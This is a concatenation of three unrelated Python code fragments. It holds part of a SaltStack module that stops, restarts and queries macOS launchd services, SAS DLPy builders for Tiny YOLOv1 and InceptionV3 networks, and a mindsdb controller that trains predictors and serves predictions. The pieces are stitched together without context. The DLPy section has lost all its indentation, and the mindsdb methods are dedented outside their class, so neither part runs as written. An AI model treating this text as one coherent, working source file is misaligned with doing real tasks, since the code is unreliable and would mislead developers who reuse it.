    :param str service_path: Full path to the plist file

    :param str domain: Target domain. May be one of the following:
        - system : this is the default
        - user/<uid> : <uid> is the user id
        - login/<asid> : <asid> is the audit session id
        - gui/<uid> : <uid> is the user id
        - session/<asid> : <asid> is the audit session id
        - pid/<pid> : <pid> is the process id

    :return: True if Successful, False if not or if the service is already
        stopped
    :rtype: bool

    CLI Example:

    .. code-block:: bash

        salt '*' service.stop /System/Library/LaunchDaemons/org.cups.cupsd.plist
    '''
    if not os.path.exists(service_path):
        msg = 'Service Path not found:\n' \
              'Path: {0}'.format(service_path)
        raise CommandExecutionError(msg)

    # Get service_target from service_path
    service_name = os.path.splitext(os.path.basename(service_path))[0]
    if domain.endswith('/'):
        service_target = '{0}{1}'.format(domain, service_name)
    else:
        service_target = '{0}/{1}'.format(domain, service_name)

    # Not running: nothing to do
    if service_name not in get_all():
        return False

    # Disable the Launch Daemon
    cmd = ['launchctl', 'disable', service_target]
    ret = __salt__['cmd.run_all'](cmd, python_shell=False)
    if ret['retcode']:
        # BUG FIX: message previously claimed the *enable* step failed
        msg = 'Failed to disable service:\n' \
              'Path: {0}\n'.format(service_path)
        msg += 'Error: {0}\n'.format(ret['stderr'])
        msg += 'StdOut: {0}'.format(ret['stdout'])
        raise CommandExecutionError(msg)

    # Remove (bootout) the Launch Daemon
    cmd = ['launchctl', 'bootout', domain, service_path]
    ret = __salt__['cmd.run_all'](cmd, python_shell=False)
    if ret['retcode']:
        # BUG FIX: message previously claimed the *bootstrap* step failed
        msg = 'Failed to bootout service:\n' \
              'Path: {0}\n'.format(service_path)
        msg += 'Error: {0}\n'.format(ret['stderr'])
        msg += 'StdOut: {0}'.format(ret['stdout'])
        raise CommandExecutionError(msg)

    # BUG FIX: get_all() holds service *names* (see the checks above), so
    # the original `service_target in get_all()` could never match and the
    # SIGKILL fallback for stuck services was dead code.
    if service_name in get_all():
        cmd = ['launchctl', 'kill', 'SIGKILL', service_target]
        ret = __salt__['cmd.run_all'](cmd, python_shell=False)
        if ret['retcode']:
            msg = 'Failed to kill the service:\n' \
                  'Path: {0}\n'.format(service_path)
            msg += 'Error: {0}\n'.format(ret['stderr'])
            msg += 'StdOut: {0}'.format(ret['stdout'])
            raise CommandExecutionError(msg)

    return service_name not in get_all()
def restart(service_target):
    '''
    Instructs launchd to kickstart the specified service. If the service is
    already running, the running service will be killed before restarting.

    :param str service_target: This is a combination of the domain and the label
        as defined in the plist file for the service. ``service.get_all`` will
        return a list of labels.

    :return: True if Successful, False if not
    :rtype: bool

    CLI Example:

    .. code-block:: bash

        salt '*' service.restart system/org.cups.cupsd
    '''
    # -k kills any running instance first; -p prints the new PID
    ret = __salt__['cmd.run_all'](
        ['launchctl', 'kickstart', '-kp', service_target],
        python_shell=False)
    if ret['retcode']:
        raise CommandExecutionError(
            'Failed to kickstart service:\n'
            'Path: {0}\n'
            'Error: {1}\n'
            'StdOut: {2}'.format(service_target, ret['stderr'], ret['stdout']))
    return not ret['stderr']
def status(name):
    '''
    Return the status for a service.

    :param str name: Can be any part of the service name or a regex expression

    :return: The PID for the service if it is running, otherwise an empty string
    :rtype: str

    CLI Example:

    .. code-block:: bash

        salt '*' service.status cups
    '''
    # TODO: Move this to mac_status function if ever created
    output = __salt__['cmd.run_stdout'](['launchctl', 'list'])

    # Collected into a newline-joined string (not a list) to mirror the
    # linux version of this module
    matched_pids = []
    for line in output.splitlines():
        if 'PID' in line:  # skip the header row
            continue
        if not re.search(name, line):
            continue
        first_field = line.split()[0]
        if first_field.isdigit():  # non-running services show '-' here
            matched_pids.append(first_field)
    return '\n'.join(matched_pids)
def available(name):
    '''
    Check that the given service is available.

    CLI Example:

    .. code-block:: bash

        salt '*' service.available com.openssh.sshd
    '''
    # _service_by_name returns the info dict or False
    return bool(_service_by_name(name))
def missing(name):
    '''
    The inverse of service.available
    Check that the given service is not available.

    CLI Example:

    .. code-block:: bash

        salt '*' service.missing com.openssh.sshd
    '''
    return not _service_by_name(name)
def enabled(name):
    '''
    Check if the specified service is enabled

    :param str name: The name of the service to look up

    :return: True if the specified service enabled, otherwise False
    :rtype: bool

    CLI Example:

    .. code-block:: bash

        salt '*' service.enabled org.cups.cupsd
    '''
    enabled_services = _get_enabled()
    return name in enabled_services
def disabled(name):
    '''
    Check if the specified service is not enabled. This is the opposite of
    ``service.enabled``

    :param str name: The name to look up

    :return: True if the specified service is NOT enabled, otherwise False
    :rtype: bool

    CLI Example:

    .. code-block:: bash

        salt '*' service.disabled org.cups.cupsd
    '''
    enabled_services = _get_enabled()
    return name not in enabled_services
def get_all():
| |
predictions_per_grid=2, do_sqrt=True, grid_number=7,
coord_scale=None, object_scale=None, prediction_not_a_object_scale=None, class_scale=None,
detection_threshold=None, iou_threshold=None, random_boxes=False):
'''
Generates a deep learning model with the Tiny Yolov1 architecture.
Tiny Yolov1 is a very small model of Yolov1, so that it includes
fewer numbers of convolutional layer.
Parameters
----------
conn : CAS
Specifies the connection of the CAS connection.
model_table : string, optional
Specifies the name of CAS table to store the model.
n_channels : int, optional
Specifies the number of the channels (i.e., depth) of the input layer.
Default: 3
width : int, optional
Specifies the width of the input layer.
Default: 448
height : int, optional
Specifies the height of the input layer.
Default: 448
scale : double, optional
Specifies a scaling factor to be applied to each pixel intensity values.
Default: 1.0 / 255
random_mutation : string, optional
Specifies how to apply data augmentations/mutations to the data in
the input layer.
Valid Values: 'none', 'random'
Default: 'NONE'
act: String, optional
Specifies the activation function to be used in the convolutional layer
layers and the final convolution layer.
Default: 'leaky'
dropout: double, optional
Specifies the drop out rate.
Default: 0
act_detection : string, optional
Specifies the activation function for the detection layer.
Valid Values: AUTO, IDENTITY, LOGISTIC, SIGMOID, TANH, RECTIFIER, RELU, SOFPLUS, ELU, LEAKY, FCMP
Default: AUTO
softmax_for_class_prob : bool, optional
Specifies whether to perform Softmax on class probability per
predicted object.
Default: True
coord_type : string, optional
Specifies the format of how to represent bounding boxes. For example,
a bounding box can be represented with the x and y locations of the
top-left point as well as width and height of the rectangle.
This format is the 'rect' format. We also support coco and yolo formats.
Valid Values: 'rect', 'yolo', 'coco'
Default: 'yolo'
max_label_per_image : int, optional
Specifies the maximum number of labels per image in the training.
Default: 30
max_boxes : int, optional
Specifies the maximum number of overall predictions allowed in the
detection layer.
Default: 30
n_classes : int, optional
Specifies the number of classes. If None is assigned, the model will
automatically detect the number of classes based on the training set.
Default: 20
predictions_per_grid : int, optional
Specifies the amount of predictions will be done per grid.
Default: 2
do_sqrt : bool, optional
Specifies whether to apply the SQRT function to width and height of
the object for the cost function.
Default: True
grid_number : int, optional
Specifies the amount of cells to be analyzed for an image. For example,
if the value is 5, then the image will be divided into a 5 x 5 grid.
Default: 7
coord_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects exist in the grid.
object_scale : float, optional
Specifies the weight for object detected for the cost function in
the detection layer.
prediction_not_a_object_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects do not exist in the grid.
class_scale : float, optional
Specifies the weight for the class of object detected for the cost
function in the detection layer.
detection_threshold : float, optional
Specifies the threshold for object detection.
iou_threshold : float, optional
Specifies the IOU Threshold of maximum suppression in object detection.
random_boxes : bool, optional
Randomizing boxes when loading the bounding box information.
Default: False
Returns
-------
:class:`Sequential`
References
----------
https://arxiv.org/pdf/1506.02640.pdf
'''
model = Sequential(conn=conn, model_table=model_table)
model.add(InputLayer(n_channels=n_channels, width=width, height=height, random_mutation=random_mutation,
scale=scale))
model.add(Conv2d(16, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(32, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(64, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(128, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(256, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(512, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(256, width=3, act=act, include_bias=False, stride=1, dropout=dropout))
model.add(Dense(n=(n_classes + (5 * predictions_per_grid)) * grid_number * grid_number, act='identity'))
model.add(Detection(act=act_detection, detection_model_type='yolov1',
softmax_for_class_prob=softmax_for_class_prob, coord_type=coord_type,
class_number=n_classes, grid_number=grid_number,
predictions_per_grid=predictions_per_grid, do_sqrt=do_sqrt, coord_scale=coord_scale,
object_scale=object_scale, prediction_not_a_object_scale=prediction_not_a_object_scale,
class_scale=class_scale, detection_threshold=detection_threshold,
iou_threshold=iou_threshold, random_boxes=random_boxes,
max_label_per_image=max_label_per_image, max_boxes=max_boxes))
return model
def InceptionV3(conn, model_table='InceptionV3',
n_classes=1000, n_channels=3, width=299, height=299, scale=1,
random_flip='none', random_crop='none', offsets=(103.939, 116.779, 123.68),
pre_trained_weights=False, pre_trained_weights_file=None, include_top=False):
'''
Generates a deep learning model with the Inceptionv3 architecture with batch normalization layers.
Parameters
----------
conn : CAS
Specifies the CAS connection object.
model_table : string, optional
Specifies the name of CAS table to store the model in.
n_classes : int, optional
Specifies the number of classes. If None is assigned, the model will
automatically detect the number of classes based on the training set.
Default: 1000
n_channels : int, optional
Specifies the number of the channels (i.e., depth) of the input layer.
Default: 3
width : int, optional
Specifies the width of the input layer.
Default: 299
height : int, optional
Specifies the height of the input layer.
Default: 299
scale : double, optional
Specifies a scaling factor to be applied to each pixel intensity values.
Default: 1.0
random_flip : string, optional
Specifies how to flip the data in the input layer when image data is
used. Approximately half of the input data is subject to flipping.
Valid Values: 'h', 'hv', 'v', 'none'
Default: 'none'
random_crop : string, optional
Specifies how to crop the data in the input layer when image data is
used. Images are cropped to the values that are specified in the width
and height parameters. Only the images with one or both dimensions
that are larger than those sizes are cropped.
Valid Values: 'none', 'unique', 'randomresized', 'resizethencrop'
Default: 'none'
offsets : double or iter-of-doubles, optional
Specifies an offset for each channel in the input data. The final input
data is set after applying scaling and subtracting the specified offsets.
Default: (103.939, 116.779, 123.68)
pre_trained_weights : bool, optional
Specifies whether to use the pre-trained weights from ImageNet data set
Default: False
pre_trained_weights_file : string, optional
Specifies the file name for the pretained weights.
Must be a fully qualified file name of SAS-compatible file (*.caffemodel.h5)
Note: Required when pre_train_weight=True.
include_top : bool, optional
Specifies whether to include pre-trained weights of the top layers,
i.e. the FC layers
Default: False
Returns
-------
:class:`Sequential`
If `pre_train_weight` is `False`
:class:`Model`
If `pre_train_weight` is `True`
References
----------
https://www.cv-foundation.org/openaccess/content_cvpr_2016/papers/Szegedy_Rethinking_the_Inception_CVPR_2016_paper.pdf
'''
conn.retrieve('loadactionset', _messagelevel='error', actionset='deeplearn')
if not pre_trained_weights:
model = Sequential(conn=conn, model_table=model_table)
model.add(InputLayer(n_channels=n_channels, width=width,
height=height, scale=scale, offsets=offsets,
random_flip=random_flip, random_crop=random_crop))
# 299 x 299 x 3
model.add(Conv2d(n_filters=32, width=3, height=3, stride=2,
act='identity', include_bias=False, padding=0))
model.add(BN(act='relu'))
# 149 x 149 x 32
model.add(Conv2d(n_filters=32, width=3, height=3, stride=1,
act='identity', include_bias=False, padding=0))
model.add(BN(act='relu'))
# 147 x 147 x 32
model.add(Conv2d(n_filters=64, width=3, height=3, stride=1,
act='identity', include_bias=False))
model.add(BN(act='relu'))
# 147 x 147 x 64
model.add(Pooling(width=3, height=3, stride=2, pool='max', padding=0))
# 73 x 73 x 64
model.add(Conv2d(n_filters=80, width=1, height=1, stride=1,
act='identity', include_bias=False, padding=0))
model.add(BN(act='relu'))
# 73 x 73 x 80
model.add(Conv2d(n_filters=192, width=3, height=3, stride=1,
act='identity', include_bias=False, padding=0))
model.add(BN(act='relu'))
# 71 x 71 x 192
pool2 = Pooling(width=3, height=3, stride=2, pool='max', padding=0)
model.add(pool2)
# mixed 0: output 35 x 35 x 256
# branch1x1
model.add(Conv2d(n_filters=64, width=1, height=1, stride=1,
act='identity', include_bias=False,
src_layers=[pool2]))
branch1x1 = BN(act='relu')
model.add(branch1x1)
# branch5x5
model.add(Conv2d(n_filters=48, width=1, height=1, stride=1,
act='identity', include_bias=False,
src_layers=[pool2]))
model.add(BN(act='relu'))
model.add(Conv2d(n_filters=64, width=5, height=5, stride=1,
act='identity', include_bias=False))
branch5x5 = BN(act='relu')
model.add(branch5x5)
# branch3x3dbl
model.add(Conv2d(n_filters=64, width=1, height=1, stride=1,
act='identity', include_bias=False,
src_layers=[pool2]))
model.add(BN(act='relu'))
model.add(Conv2d(n_filters=96, width=3, height=3, stride=1,
act='identity', include_bias=False))
model.add(BN(act='relu'))
model.add(Conv2d(n_filters=96, width=3, height=3, stride=1,
act='identity', include_bias=False))
branch3x3dbl = BN(act='relu')
model.add(branch3x3dbl)
# branch_pool
model.add(Pooling(width=3, height=3, stride=1, pool='average',
src_layers=[pool2]))
model.add(Conv2d(n_filters=32, width=1, height=1, stride=1,
act='identity', include_bias=False))
branch_pool = BN(act='relu')
model.add(branch_pool)
# mixed0 concat
concat = Concat(act='identity',
src_layers=[branch1x1, branch5x5, branch3x3dbl,
branch_pool])
model.add(concat)
# mixed 1: output 35 x 35 x 288
# branch1x1
model.add(Conv2d(n_filters=64, width=1, height=1, stride=1,
act='identity', include_bias=False,
src_layers=[concat]))
branch1x1 = BN(act='relu')
model.add(branch1x1)
# branch5x5
model.add(Conv2d(n_filters=48, width=1, height=1, stride=1,
act='identity', include_bias=False,
src_layers=[concat]))
model.add(BN(act='relu'))
model.add(Conv2d(n_filters=64, width=5, height=5, stride=1,
act='identity', include_bias=False))
branch5x5 = BN(act='relu')
model.add(branch5x5)
# branch3x3dbl
model.add(Conv2d(n_filters=64, width=1, height=1, stride=1,
act='identity', include_bias=False,
src_layers=[concat]))
model.add(BN(act='relu'))
model.add(Conv2d(n_filters=96, width=3, | |
import os
import sys
import time
import json
import base64
import psutil
import datetime
from copy import deepcopy
from contextlib import contextmanager
from dateutil.parser import parse as parse_datetime
from typing import Optional, Tuple, Union, Dict, Any
import requests
from typing import List
import lightwood
from lightwood.api.types import ProblemDefinition
from lightwood import __version__ as lightwood_version
import numpy as np
import pandas as pd
from pandas.core.frame import DataFrame
import mindsdb_datasources
from mindsdb import __version__ as mindsdb_version
import mindsdb.interfaces.storage.db as db
from mindsdb.utilities.functions import mark_process
from mindsdb.utilities.json_encoder import json_serialiser
from mindsdb.utilities.config import Config
from mindsdb.interfaces.storage.fs import FsStore
from mindsdb.utilities.log import log
from mindsdb.interfaces.model.learn_process import LearnProcess, GenerateProcess, FitProcess, UpdateProcess, LearnRemoteProcess
from mindsdb.interfaces.datastore.datastore import DataStore
from mindsdb.interfaces.datastore.datastore import QueryDS
from mindsdb.utilities.hooks import after_predict as after_predict_hook
# True when running under Python 3.6 or older. multiprocessing.Process.close()
# only exists from 3.7 onward, so callers skip p.close() on these versions.
# Fixed: the original compared only sys.version_info[1] (the minor version),
# which would also be true for e.g. a hypothetical 4.0; compare (major, minor).
IS_PY36 = sys.version_info[:2] <= (3, 6)
class ModelController():
    """Manage the lifecycle of lightwood predictors for mindsdb.

    Responsibilities visible in this class: creating and training predictors
    (``learn``), running inference (``predict``), analysing datasources, and
    keeping an in-memory cache of deserialized predictors.
    """
    # Global mindsdb configuration, loaded once at construction.
    config: Config
    # File-system backed store used to fetch serialized predictor state.
    fs_store: FsStore
    # In-memory cache keyed by '{company_id}@@@@@{name}'; each entry holds
    # 'predictor', 'updated_at', 'created', 'code' and 'pickle' fields.
    predictor_cache: Dict[str, Dict[str, Any]]
    # Whether this controller runs under ray (distributed) execution.
    ray_based: bool

    def __init__(self, ray_based: bool) -> None:
        """Initialise config/store handles and an empty predictor cache."""
        self.config = Config()
        self.fs_store = FsStore()
        self.predictor_cache = {}
        self.ray_based = ray_based
def _invalidate_cached_predictors(self) -> None:
    """Evict predictor-cache entries older than 20 minutes (1200 s).

    @TODO: the cache can still go stale if the owning ModelInterface is
    never invoked again while other instances keep predictors cached; in
    practice this shouldn't be a big issue.
    """
    stale_keys = [
        key
        for key, entry in list(self.predictor_cache.items())
        if (datetime.datetime.now() - entry['created']).total_seconds() > 1200
    ]
    for key in stale_keys:
        del self.predictor_cache[key]
def _lock_predictor(self, id: int, mode: str) -> bool:
    """Block until a 'predictor' semaphore row for `id` is acquired.

    Concurrent 'read' locks are shared: if a read lock is already held and
    `mode` is 'read', the call succeeds immediately. Otherwise the lock is
    taken by inserting a Semaphor row; a conflicting insert fails to commit
    and the attempt is retried once per second, forever.

    Parameters
    ----------
    id : int
        Predictor id to lock.
    mode : str
        Lock action, e.g. 'read' or 'write'.

    Returns
    -------
    bool
        Always True once the lock is acquired (the call never gives up).
        (Fixed: the annotation previously said ``-> None``.)
    """
    from mindsdb.interfaces.storage.db import session, Semaphor
    while True:
        semaphor_record = session.query(Semaphor).filter_by(entity_id=id, entity_type='predictor').first()
        if semaphor_record is not None:
            # Shared read lock: piggyback on an existing 'read' holder.
            if mode == 'read' and semaphor_record.action == 'read':
                return True
        try:
            semaphor_record = Semaphor(entity_id=id, entity_type='predictor', action=mode)
            session.add(semaphor_record)
            session.commit()
            return True
        except Exception:
            # Commit fails when another worker holds the lock. Roll the
            # session back so it is usable on the next retry (a failed
            # commit otherwise leaves the session in an unusable state).
            session.rollback()
        time.sleep(1)
def _unlock_predictor(self, id: int) -> None:
    """Release the 'predictor' semaphore row for `id`, if one exists."""
    from mindsdb.interfaces.storage.db import session, Semaphor
    record = (
        session.query(Semaphor)
        .filter_by(entity_id=id, entity_type='predictor')
        .first()
    )
    if record is None:
        return
    session.delete(record)
    session.commit()
@contextmanager
def _lock_context(self, id, mode: str):
    """Context manager pairing _lock_predictor with _unlock_predictor.

    Yields True once the lock is held; the `finally` guarantees the
    semaphore row is removed even if the body raises.
    """
    try:
        self._lock_predictor(id, mode)
        yield True
    finally:
        self._unlock_predictor(id)
def _get_from_data_df(self, from_data: dict) -> DataFrame:
    """Materialise the datasource described by `from_data` into a DataFrame.

    `from_data` carries {'class', 'args', 'kwargs'}; 'QueryDS' is handled
    specially, any other class name is resolved from mindsdb_datasources.
    """
    if from_data['class'] == 'QueryDS':
        ds_cls = QueryDS
    else:
        ds_cls = getattr(mindsdb_datasources, from_data['class'])
    datasource = ds_cls(*from_data['args'], **from_data['kwargs'])
    return datasource.df
def _unpack_old_args(
    self, from_data: dict, kwargs: dict, to_predict: Optional[Union[str, list]] = None
) -> Tuple[Optional[pd.DataFrame], dict, bool, dict]:
    """Translate the legacy `learn` call arguments into modern pieces.

    Parameters
    ----------
    from_data : dict or None
        Datasource description ({'class', 'args', 'kwargs'}) or None.
    kwargs : dict
        Legacy options. Mutated in place: dotted keys are expanded into
        nested dicts and 'join_learn_process' is removed.
    to_predict : Optional[Union[str, list]]
        Target column as a string or a one-element list.

    Returns
    -------
    tuple
        ``(df, problem_definition, join_learn_process, json_ai_override)``
        where `df` is the materialised DataFrame (or None),
        `problem_definition` is a plain dict, `join_learn_process` is a
        bool and `json_ai_override` collects keys belonging to lightwood's
        JsonAI. (Fixed: the annotation previously declared a 3-tuple with
        a ProblemDefinition second element, but a 4-tuple with a dict is
        what is actually returned.)

    Raises
    ------
    Exception
        If no usable target can be derived from `to_predict`/`kwargs`.
    """
    # When `kwargs` is non-empty, problem_definition aliases it, so the
    # mutations below apply to both names.
    problem_definition = kwargs or {}
    if isinstance(to_predict, str):
        problem_definition['target'] = to_predict
    elif isinstance(to_predict, list) and len(to_predict) == 1:
        problem_definition['target'] = to_predict[0]
    elif problem_definition.get('target') is None:
        raise Exception(
            f"Predict target must be 'str' or 'list' with 1 element. Got: {to_predict}"
        )

    # Expand dotted keys: {'a.b.c': v} -> {'a': {'b': {'c': v}}}. The outer
    # while re-scans because an expansion can itself introduce dotted keys.
    while '.' in str(list(kwargs.keys())):
        for k in list(kwargs.keys()):
            if '.' in k:
                nks = k.split('.')
                obj = kwargs
                for nk in nks[:-1]:
                    if nk not in obj:
                        obj[nk] = {}
                    obj = obj[nk]
                obj[nks[-1]] = kwargs[k]
                del kwargs[k]

    # Controller-level flag, not part of the problem definition; pop keeps
    # the original get-then-delete semantics in one step.
    join_learn_process = kwargs.pop('join_learn_process', False)

    # Adapt legacy kwargs to problem-definition fields.
    if 'timeseries_settings' in kwargs:
        problem_definition['timeseries_settings'] = kwargs['timeseries_settings']

    if 'stop_training_in_x_seconds' in kwargs:
        problem_definition['time_aim'] = kwargs['stop_training_in_x_seconds']

    if kwargs.get('ignore_columns') is not None:
        problem_definition['ignore_features'] = kwargs['ignore_columns']

    # Any kwarg matching a JsonAI annotation becomes a lightwood override.
    json_ai_override = {}
    json_ai_keys = list(lightwood.JsonAI.__dict__['__annotations__'].keys())
    for k in kwargs:
        if k in json_ai_keys:
            json_ai_override[k] = kwargs[k]

    # Normalise a scalar ignore_features value into a list.
    if (
        problem_definition.get('ignore_features') is not None and isinstance(problem_definition['ignore_features'], list) is False
    ):
        problem_definition['ignore_features'] = [problem_definition['ignore_features']]

    if from_data is not None:
        df = self._get_from_data_df(from_data)
    else:
        df = None

    return df, problem_definition, join_learn_process, json_ai_override
@mark_process(name='learn')
def learn(self, name: str, from_data: dict, to_predict: str, dataset_id: int, kwargs: dict,
          company_id: int, delete_ds_on_fail: Optional[bool] = False, user_class=0) -> None:
    """Create a predictor record and train it in a background process.

    Parameters
    ----------
    name : str
        Predictor name; must be unique per company.
    from_data : dict
        Datasource description consumed by `_unpack_old_args`.
    to_predict : str
        Target column (a one-element list is also accepted downstream).
    dataset_id : int
        Id of the linked dataset row.
    kwargs : dict
        Legacy options; converted into a problem definition.
    company_id : int
        Owner company; scopes uniqueness checks and records.
    delete_ds_on_fail : Optional[bool]
        Forwarded to LearnProcess so it can clean up the datasource.
    user_class : int
        Account tier; 1 appears to mean a paid account exempt from the
        cloud row limit -- TODO confirm.

    Raises
    ------
    Exception
        If the name is taken or cloud-account limits are exceeded.
    """
    # Enforce per-company name uniqueness before doing any work.
    predictor_record = db.session.query(db.Predictor).filter_by(company_id=company_id, name=name).first()
    if predictor_record is not None:
        raise Exception('Predictor name must be unique.')

    df, problem_definition, join_learn_process, json_ai_override = self._unpack_old_args(from_data, kwargs, to_predict)

    is_cloud = self.config.get('cloud', False)
    if is_cloud is True:
        # Cloud quota: count models generating/training in the last hour.
        models = self.get_models(company_id)
        count = 0
        for model in models:
            if model.get('status') in ['generating', 'training']:
                created_at = model.get('created_at')
                if isinstance(created_at, str):
                    created_at = parse_datetime(created_at)
                # NOTE(review): this re-reads the raw value, so entries whose
                # created_at arrived as a string are skipped even though they
                # were just parsed above -- looks unintended; verify.
                if isinstance(model.get('created_at'), datetime.datetime) is False:
                    continue
                if (datetime.datetime.now() - created_at) < datetime.timedelta(hours=1):
                    count += 1
        if count == 2:
            raise Exception('You can train no more than 2 models at the same time')
        if user_class != 1 and len(df) > 10000:
            raise Exception('Datasets are limited to 10,000 rows on free accounts')

    if 'url' in problem_definition:
        # "Custom" predictor: training and/or prediction are delegated to
        # user-supplied HTTP endpoints instead of a local lightwood model.
        train_url = problem_definition['url'].get('train', None)
        predict_url = problem_definition['url'].get('predict', None)
        com_format = problem_definition['format']
        api_token = problem_definition['API_TOKEN'] if ('API_TOKEN' in problem_definition) else None
        input_column = problem_definition['input_column'] if ('input_column' in problem_definition) else None
        predictor_record = db.Predictor(
            company_id=company_id,
            name=name,
            dataset_id=dataset_id,
            mindsdb_version=mindsdb_version,
            lightwood_version=lightwood_version,
            to_predict=problem_definition['target'],
            learn_args=ProblemDefinition.from_dict(problem_definition).to_dict(),
            data={'name': name, 'train_url': train_url, 'predict_url': predict_url, 'format': com_format,
                  'status': 'complete' if train_url is None else 'training', 'API_TOKEN': api_token, 'input_column': input_column},
            is_custom=True,
            # @TODO: For testing purposes, remove afterwards!
            dtype_dict=json_ai_override['dtype_dict'],
        )
        db.session.add(predictor_record)
        db.session.commit()
        if train_url is not None:
            p = LearnRemoteProcess(df, predictor_record.id)
            p.start()
            if join_learn_process:
                p.join()
                if not IS_PY36:
                    # Process.close() only exists on Python >= 3.7.
                    p.close()
        db.session.refresh(predictor_record)
        return

    # Standard (local lightwood) path: persist the record, then train in a
    # separate process so the caller is not blocked unless it asks to be.
    problem_definition = ProblemDefinition.from_dict(problem_definition)
    predictor_record = db.Predictor(
        company_id=company_id,
        name=name,
        dataset_id=dataset_id,
        mindsdb_version=mindsdb_version,
        lightwood_version=lightwood_version,
        to_predict=problem_definition.target,
        learn_args=problem_definition.to_dict(),
        data={'name': name},
    )
    db.session.add(predictor_record)
    db.session.commit()
    predictor_id = predictor_record.id

    p = LearnProcess(df, problem_definition, predictor_id, delete_ds_on_fail, json_ai_override)
    p.start()
    if join_learn_process:
        p.join()
        if not IS_PY36:
            p.close()
    db.session.refresh(predictor_record)
@mark_process(name='predict')
def predict(self, name: str, when_data: Union[dict, list, pd.DataFrame], pred_format: str, company_id: int):
    """Run inference with predictor `name` over `when_data`.

    Parameters
    ----------
    name : str
        Predictor name (without the company prefix).
    when_data : Union[dict, list, pd.DataFrame]
        Either a datasource description ({'class', 'args', 'kwargs'}) or
        raw rows as a dict / list of dicts / DataFrame.
    pred_format : str
        'explain', 'dict' or 'dict&explain' for shaped output; anything
        else returns the raw prediction records.
    company_id : int
        Owner company id.

    Returns
    -------
    list or tuple
        Prediction records shaped according to `pred_format`.
    """
    original_name = name
    # Cache keys are namespaced by company to avoid cross-tenant collisions.
    name = f'{company_id}@@@@@{name}'

    predictor_record = db.session.query(db.Predictor).filter_by(company_id=company_id, name=original_name).first()
    assert predictor_record is not None
    predictor_data = self.get_model_data(name, company_id)

    # Materialise the input rows into a DataFrame.
    if isinstance(when_data, dict) and 'kwargs' in when_data and 'args' in when_data:
        ds_cls = getattr(mindsdb_datasources, when_data['class'])
        df = ds_cls(*when_data['args'], **when_data['kwargs']).df
    else:
        if isinstance(when_data, dict):
            when_data = [when_data]
        df = pd.DataFrame(when_data)

    if predictor_record.is_custom:
        # Custom predictors proxy the request to an external HTTP endpoint.
        if predictor_data['format'] == 'mlflow':
            resp = requests.post(predictor_data['predict_url'],
                                 data=df.to_json(orient='records'),
                                 headers={'content-type': 'application/json; format=pandas-records'})
            answer: List[object] = resp.json()
            predictions = pd.DataFrame({
                'prediction': answer
            })
        elif predictor_data['format'] == 'huggingface':
            headers = {"Authorization": "Bearer {API_TOKEN}".format(API_TOKEN=predictor_data['API_TOKEN'])}
            col_data = df[predictor_data['input_column']]
            # NOTE(review): Series.rename is not in-place and its result is
            # discarded, so this line looks like a no-op -- confirm whether
            # the payload key was meant to be renamed to 'inputs'.
            col_data.rename({predictor_data['input_column']: 'inputs'}, axis='columns')
            serialized_df = json.dumps(col_data.to_dict())
            resp = requests.post(predictor_data['predict_url'], headers=headers, data=serialized_df)
            predictions = pd.DataFrame(resp.json())
        elif predictor_data['format'] == 'ray_server':
            serialized_df = json.dumps(df.to_dict())
            resp = requests.post(predictor_data['predict_url'], json={'df': serialized_df})
            predictions = pd.DataFrame(resp.json())
    else:
        # Local lightwood predictor: load from the fs store, with caching.
        fs_name = f'predictor_{company_id}_{predictor_record.id}'
        # Invalidate a cached copy that is older than the stored record.
        if (
            name in self.predictor_cache
            and self.predictor_cache[name]['updated_at'] != predictor_record.updated_at
        ):
            del self.predictor_cache[name]
        if name not in self.predictor_cache:
            # Clear the cache entirely if we have less than 1.2 GB left
            if psutil.virtual_memory().available < 1.2 * pow(10, 9):
                self.predictor_cache = {}
            if predictor_data['status'] == 'complete':
                self.fs_store.get(fs_name, fs_name, self.config['paths']['predictors'])
                self.predictor_cache[name] = {
                    'predictor': lightwood.predictor_from_state(
                        os.path.join(self.config['paths']['predictors'], fs_name),
                        predictor_record.code
                    ),
                    'updated_at': predictor_record.updated_at,
                    'created': datetime.datetime.now(),
                    'code': predictor_record.code,
                    'pickle': str(os.path.join(self.config['paths']['predictors'], fs_name))
                }
            else:
                raise Exception(
                    f'Trying to predict using predictor {original_name} with status: {predictor_data["status"]}. Error is: {predictor_data.get("error", "unknown")}'
                )
        predictions = self.predictor_cache[name]['predictor'].predict(df)
        # Bellow is useful for debugging caching and storage issues
        # del self.predictor_cache[name]

    predictions = predictions.to_dict(orient='records')

    after_predict_hook(
        company_id=company_id,
        predictor_id=predictor_record.id,
        rows_in_count=df.shape[0],
        columns_in_count=df.shape[1],
        rows_out_count=len(predictions)
    )

    target = predictor_record.to_predict[0]
    if pred_format in ('explain', 'dict', 'dict&explain'):
        # Build both shapes in one pass; which (or both) is returned
        # depends on pred_format.
        explain_arr = []
        dict_arr = []
        for i, row in enumerate(predictions):
            obj = {
                target: {
                    'predicted_value': row['prediction'],
                    'confidence': row.get('confidence', None),
                    'anomaly': row.get('anomaly', None),
                    'truth': row.get('truth', None)
                }
            }
            if 'lower' in row:
                obj[target]['confidence_lower_bound'] = row.get('lower', None)
                obj[target]['confidence_upper_bound'] = row.get('upper', None)
            explain_arr.append(obj)

            td = {'predicted_value': row['prediction']}
            for col in df.columns:
                if col in row:
                    td[col] = row[col]
                elif f'order_{col}' in row:
                    td[col] = row[f'order_{col}']
                elif f'group_{col}' in row:
                    td[col] = row[f'group_{col}']
                else:
                    # Fall back to the input row; timeseries predictors may
                    # reorder rows, hence the original_index lookup.
                    orginal_index = row.get('original_index')
                    if orginal_index is None:
                        log.warning('original_index is None')
                        orginal_index = i
                    td[col] = df.iloc[orginal_index][col]
            dict_arr.append({target: td})
        if pred_format == 'explain':
